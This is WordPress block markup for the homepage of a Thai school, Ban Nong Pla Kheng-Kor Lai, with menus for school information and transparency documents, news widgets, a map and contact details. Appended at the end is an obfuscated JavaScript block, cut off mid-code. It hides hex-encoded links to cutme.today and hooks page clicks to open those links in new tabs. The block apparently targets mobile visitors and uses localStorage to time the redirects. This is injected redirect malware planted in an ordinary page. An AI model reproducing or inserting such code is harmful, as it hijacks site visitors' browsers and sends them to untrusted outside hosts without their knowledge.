900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 